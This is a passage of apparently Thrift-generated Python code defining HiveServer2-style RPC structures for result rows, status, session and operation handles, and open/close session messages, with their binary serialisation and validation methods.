      4: ('i32Val', TI32Value),
      5: ('i64Val', TI64Value),
      6: ('doubleVal', TDoubleValue),
      7: ('stringVal', TStringValue),
    }
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid in field_map and ftype == TType.STRUCT:
        attr, wrapper_cls = field_map[fid]
        wrapped = wrapper_cls()
        wrapped.read(iprot)
        setattr(self, attr, wrapped)
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: delegate encoding to the C extension when possible.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TColumnValue')
    # Emit each set field in field-id order; attribute names match the
    # Thrift field names.
    for fid, attr in ((1, 'boolVal'), (2, 'byteVal'), (3, 'i16Val'),
                      (4, 'i32Val'), (5, 'i64Val'), (6, 'doubleVal'),
                      (7, 'stringVal')):
      wrapped = getattr(self, attr)
      if wrapped is not None:
        oprot.writeFieldBegin(attr, TType.STRUCT, fid)
        wrapped.write(oprot)
        oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TRow(object):
  """One row of a result set: an ordered list of cell values.

  Attributes:
   - colVals: list of TColumnValue, one per column (required)
  """

  thrift_spec = (
    None, # 0
    (1, TType.LIST, 'colVals', (TType.STRUCT,(TColumnValue, TColumnValue.thrift_spec)), None, ), # 1
  )

  def __init__(self, colVals=None,):
    self.colVals = colVals

  def read(self, iprot):
    # Fast path: delegate decoding to the C extension when possible.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.LIST:
        bucket = []
        self.colVals = bucket
        (_etype, count) = iprot.readListBegin()
        for _ in xrange(count):
          cell = TColumnValue()
          cell.read(iprot)
          bucket.append(cell)
        iprot.readListEnd()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: delegate encoding to the C extension when possible.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TRow')
    if self.colVals is not None:
      oprot.writeFieldBegin('colVals', TType.LIST, 1)
      oprot.writeListBegin(TType.STRUCT, len(self.colVals))
      for cell in self.colVals:
        cell.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.colVals is None:
      raise TProtocol.TProtocolException(message='Required field colVals is unset!')
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TRowSet(object):
  """A batch of fetched result data.

  Attributes:
   - startRowOffset: offset of the first row in this batch (required)
   - rows: row-oriented data, list of TRow (required)
   - columns: column-oriented data, list of TColumn (optional)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'startRowOffset', None, None, ), # 1
    (2, TType.LIST, 'rows', (TType.STRUCT,(TRow, TRow.thrift_spec)), None, ), # 2
    (3, TType.LIST, 'columns', (TType.STRUCT,(TColumn, TColumn.thrift_spec)), None, ), # 3
  )

  def __init__(self, startRowOffset=None, rows=None, columns=None,):
    self.startRowOffset = startRowOffset
    self.rows = rows
    self.columns = columns

  def read(self, iprot):
    # Fast path: delegate decoding to the C extension when possible.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.I64:
        self.startRowOffset = iprot.readI64()
      elif fid == 2 and ftype == TType.LIST:
        bucket = []
        self.rows = bucket
        (_etype, count) = iprot.readListBegin()
        for _ in xrange(count):
          row = TRow()
          row.read(iprot)
          bucket.append(row)
        iprot.readListEnd()
      elif fid == 3 and ftype == TType.LIST:
        bucket = []
        self.columns = bucket
        (_etype, count) = iprot.readListBegin()
        for _ in xrange(count):
          col = TColumn()
          col.read(iprot)
          bucket.append(col)
        iprot.readListEnd()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: delegate encoding to the C extension when possible.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TRowSet')
    if self.startRowOffset is not None:
      oprot.writeFieldBegin('startRowOffset', TType.I64, 1)
      oprot.writeI64(self.startRowOffset)
      oprot.writeFieldEnd()
    if self.rows is not None:
      oprot.writeFieldBegin('rows', TType.LIST, 2)
      oprot.writeListBegin(TType.STRUCT, len(self.rows))
      for row in self.rows:
        row.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.columns is not None:
      oprot.writeFieldBegin('columns', TType.LIST, 3)
      oprot.writeListBegin(TType.STRUCT, len(self.columns))
      for col in self.columns:
        col.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.startRowOffset is None:
      raise TProtocol.TProtocolException(message='Required field startRowOffset is unset!')
    if self.rows is None:
      raise TProtocol.TProtocolException(message='Required field rows is unset!')
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TStatus(object):
  """Outcome of an RPC call.

  Attributes:
   - statusCode: numeric status (required)
   - infoMessages: optional list of informational strings
   - sqlState: optional SQLSTATE code string
   - errorCode: optional numeric error code
   - errorMessage: optional human-readable error text
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'statusCode', None, None, ), # 1
    (2, TType.LIST, 'infoMessages', (TType.STRING,None), None, ), # 2
    (3, TType.STRING, 'sqlState', None, None, ), # 3
    (4, TType.I32, 'errorCode', None, None, ), # 4
    (5, TType.STRING, 'errorMessage', None, None, ), # 5
  )

  def __init__(self, statusCode=None, infoMessages=None, sqlState=None, errorCode=None, errorMessage=None,):
    self.statusCode = statusCode
    self.infoMessages = infoMessages
    self.sqlState = sqlState
    self.errorCode = errorCode
    self.errorMessage = errorMessage

  def read(self, iprot):
    # Fast path: delegate decoding to the C extension when possible.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.I32:
        self.statusCode = iprot.readI32()
      elif fid == 2 and ftype == TType.LIST:
        bucket = []
        self.infoMessages = bucket
        (_etype, count) = iprot.readListBegin()
        for _ in xrange(count):
          bucket.append(iprot.readString())
        iprot.readListEnd()
      elif fid == 3 and ftype == TType.STRING:
        self.sqlState = iprot.readString()
      elif fid == 4 and ftype == TType.I32:
        self.errorCode = iprot.readI32()
      elif fid == 5 and ftype == TType.STRING:
        self.errorMessage = iprot.readString()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: delegate encoding to the C extension when possible.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TStatus')
    if self.statusCode is not None:
      oprot.writeFieldBegin('statusCode', TType.I32, 1)
      oprot.writeI32(self.statusCode)
      oprot.writeFieldEnd()
    if self.infoMessages is not None:
      oprot.writeFieldBegin('infoMessages', TType.LIST, 2)
      oprot.writeListBegin(TType.STRING, len(self.infoMessages))
      for msg in self.infoMessages:
        oprot.writeString(msg)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.sqlState is not None:
      oprot.writeFieldBegin('sqlState', TType.STRING, 3)
      oprot.writeString(self.sqlState)
      oprot.writeFieldEnd()
    if self.errorCode is not None:
      oprot.writeFieldBegin('errorCode', TType.I32, 4)
      oprot.writeI32(self.errorCode)
      oprot.writeFieldEnd()
    if self.errorMessage is not None:
      oprot.writeFieldBegin('errorMessage', TType.STRING, 5)
      oprot.writeString(self.errorMessage)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.statusCode is None:
      raise TProtocol.TProtocolException(message='Required field statusCode is unset!')
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class THandleIdentifier(object):
  """Opaque identifier backing a session/operation handle.

  Attributes:
   - guid: unique identifier (required)
   - secret: companion secret paired with the guid (required)
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'guid', None, None, ), # 1
    (2, TType.STRING, 'secret', None, None, ), # 2
  )

  def __init__(self, guid=None, secret=None,):
    self.guid = guid
    self.secret = secret

  def read(self, iprot):
    # Fast path: delegate decoding to the C extension when possible.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.STRING:
        self.guid = iprot.readString()
      elif fid == 2 and ftype == TType.STRING:
        self.secret = iprot.readString()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: delegate encoding to the C extension when possible.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('THandleIdentifier')
    if self.guid is not None:
      oprot.writeFieldBegin('guid', TType.STRING, 1)
      oprot.writeString(self.guid)
      oprot.writeFieldEnd()
    if self.secret is not None:
      oprot.writeFieldBegin('secret', TType.STRING, 2)
      oprot.writeString(self.secret)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.guid is None:
      raise TProtocol.TProtocolException(message='Required field guid is unset!')
    if self.secret is None:
      raise TProtocol.TProtocolException(message='Required field secret is unset!')
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TSessionHandle(object):
  """Thrift struct: handle identifying an open client session on the server.

  Attributes:
   - sessionId
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionId', (THandleIdentifier, THandleIdentifier.thrift_spec), None, ), # 1
  )
  def __init__(self, sessionId=None,):
    self.sessionId = sessionId
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionId = THandleIdentifier()
          self.sessionId.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TSessionHandle')
    if self.sessionId is not None:
      oprot.writeFieldBegin('sessionId', TType.STRUCT, 1)
      self.sessionId.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.sessionId is None:
      raise TProtocol.TProtocolException(message='Required field sessionId is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TOperationHandle(object):
  """Thrift struct: handle identifying a server-side operation, with its type,
  a flag for whether it produced a result set, and an optional modified-row count.

  Attributes:
   - operationId
   - operationType
   - hasResultSet
   - modifiedRowCount
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'operationId', (THandleIdentifier, THandleIdentifier.thrift_spec), None, ), # 1
    (2, TType.I32, 'operationType', None, None, ), # 2
    (3, TType.BOOL, 'hasResultSet', None, None, ), # 3
    (4, TType.DOUBLE, 'modifiedRowCount', None, None, ), # 4
  )
  def __init__(self, operationId=None, operationType=None, hasResultSet=None, modifiedRowCount=None,):
    self.operationId = operationId
    self.operationType = operationType
    self.hasResultSet = hasResultSet
    self.modifiedRowCount = modifiedRowCount
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.operationId = THandleIdentifier()
          self.operationId.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.operationType = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.BOOL:
          self.hasResultSet = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.DOUBLE:
          self.modifiedRowCount = iprot.readDouble();
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TOperationHandle')
    if self.operationId is not None:
      oprot.writeFieldBegin('operationId', TType.STRUCT, 1)
      self.operationId.write(oprot)
      oprot.writeFieldEnd()
    if self.operationType is not None:
      oprot.writeFieldBegin('operationType', TType.I32, 2)
      oprot.writeI32(self.operationType)
      oprot.writeFieldEnd()
    if self.hasResultSet is not None:
      oprot.writeFieldBegin('hasResultSet', TType.BOOL, 3)
      oprot.writeBool(self.hasResultSet)
      oprot.writeFieldEnd()
    if self.modifiedRowCount is not None:
      oprot.writeFieldBegin('modifiedRowCount', TType.DOUBLE, 4)
      oprot.writeDouble(self.modifiedRowCount)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset (modifiedRowCount is optional)."""
    if self.operationId is None:
      raise TProtocol.TProtocolException(message='Required field operationId is unset!')
    if self.operationType is None:
      raise TProtocol.TProtocolException(message='Required field operationType is unset!')
    if self.hasResultSet is None:
      raise TProtocol.TProtocolException(message='Required field hasResultSet is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TOpenSessionReq(object):
  """Thrift struct: request to open a session (protocol version, credentials,
  and a string->string map of session configuration overrides).

  Attributes:
   - client_protocol
   - username
   - password
   - configuration
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'client_protocol', None, 1, ), # 1
    (2, TType.STRING, 'username', None, None, ), # 2
    (3, TType.STRING, 'password', None, None, ), # 3
    (4, TType.MAP, 'configuration', (TType.STRING,None,TType.STRING,None), None, ), # 4
  )
  # client_protocol defaults to the IDL default stored in thrift_spec (field 1 -> 1).
  def __init__(self, client_protocol=thrift_spec[1][4], username=None, password=None, configuration=None,):
    self.client_protocol = client_protocol
    self.username = username
    self.password = password
    self.configuration = configuration
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.client_protocol = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.username = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.password = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.MAP:
          self.configuration = {}
          (_ktype110, _vtype111, _size109 ) = iprot.readMapBegin()
          for _i113 in xrange(_size109):
            _key114 = iprot.readString();
            _val115 = iprot.readString();
            self.configuration[_key114] = _val115
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TOpenSessionReq')
    if self.client_protocol is not None:
      oprot.writeFieldBegin('client_protocol', TType.I32, 1)
      oprot.writeI32(self.client_protocol)
      oprot.writeFieldEnd()
    if self.username is not None:
      oprot.writeFieldBegin('username', TType.STRING, 2)
      oprot.writeString(self.username)
      oprot.writeFieldEnd()
    if self.password is not None:
      oprot.writeFieldBegin('password', TType.STRING, 3)
      oprot.writeString(self.password)
      oprot.writeFieldEnd()
    if self.configuration is not None:
      oprot.writeFieldBegin('configuration', TType.MAP, 4)
      oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.configuration))
      for kiter116,viter117 in self.configuration.items():
        oprot.writeString(kiter116)
        oprot.writeString(viter117)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.client_protocol is None:
      raise TProtocol.TProtocolException(message='Required field client_protocol is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TOpenSessionResp(object):
  """Thrift struct: response to OpenSession — status, the protocol version the
  server selected, the new session handle, and server-side configuration.

  Attributes:
   - status
   - serverProtocolVersion
   - sessionHandle
   - configuration
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
    (2, TType.I32, 'serverProtocolVersion', None, 1, ), # 2
    (3, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 3
    (4, TType.MAP, 'configuration', (TType.STRING,None,TType.STRING,None), None, ), # 4
  )
  # serverProtocolVersion defaults to the IDL default stored in thrift_spec (field 2 -> 1).
  def __init__(self, status=None, serverProtocolVersion=thrift_spec[2][4], sessionHandle=None, configuration=None,):
    self.status = status
    self.serverProtocolVersion = serverProtocolVersion
    self.sessionHandle = sessionHandle
    self.configuration = configuration
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.serverProtocolVersion = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.MAP:
          self.configuration = {}
          (_ktype119, _vtype120, _size118 ) = iprot.readMapBegin()
          for _i122 in xrange(_size118):
            _key123 = iprot.readString();
            _val124 = iprot.readString();
            self.configuration[_key123] = _val124
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TOpenSessionResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    if self.serverProtocolVersion is not None:
      oprot.writeFieldBegin('serverProtocolVersion', TType.I32, 2)
      oprot.writeI32(self.serverProtocolVersion)
      oprot.writeFieldEnd()
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 3)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    if self.configuration is not None:
      oprot.writeFieldBegin('configuration', TType.MAP, 4)
      oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.configuration))
      for kiter125,viter126 in self.configuration.items():
        oprot.writeString(kiter125)
        oprot.writeString(viter126)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    if self.serverProtocolVersion is None:
      raise TProtocol.TProtocolException(message='Required field serverProtocolVersion is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TCloseSessionReq(object):
  """Thrift struct: request to close the session identified by sessionHandle.

  Attributes:
   - sessionHandle
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'sessionHandle', (TSessionHandle, TSessionHandle.thrift_spec), None, ), # 1
  )
  def __init__(self, sessionHandle=None,):
    self.sessionHandle = sessionHandle
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.sessionHandle = TSessionHandle()
          self.sessionHandle.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TCloseSessionReq')
    if self.sessionHandle is not None:
      oprot.writeFieldBegin('sessionHandle', TType.STRUCT, 1)
      self.sessionHandle.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.sessionHandle is None:
      raise TProtocol.TProtocolException(message='Required field sessionHandle is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class TCloseSessionResp(object):
  """Thrift struct: response to CloseSession carrying only the call status.

  Attributes:
   - status
  """
  # (field id, thrift type, name, type args, default), indexed by field id.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'status', (TStatus, TStatus.thrift_spec), None, ), # 1
  )
  def __init__(self, status=None,):
    self.status = status
  def read(self, iprot):
    """Deserialize this struct from *iprot*; uses the accelerated C decoder when available."""
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.status = TStatus()
          self.status.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        # Unknown field id: skip for forward compatibility.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    """Serialize this struct to *oprot*; uses the accelerated C encoder when available."""
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TCloseSessionResp')
    if self.status is not None:
      oprot.writeFieldBegin('status', TType.STRUCT, 1)
      self.status.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    """Raise TProtocolException if a required field is unset."""
    if self.status is None:
      raise TProtocol.TProtocolException(message='Required field status is unset!')
    return
  def __repr__(self):
    L = ['%s=%r' % (key, value)
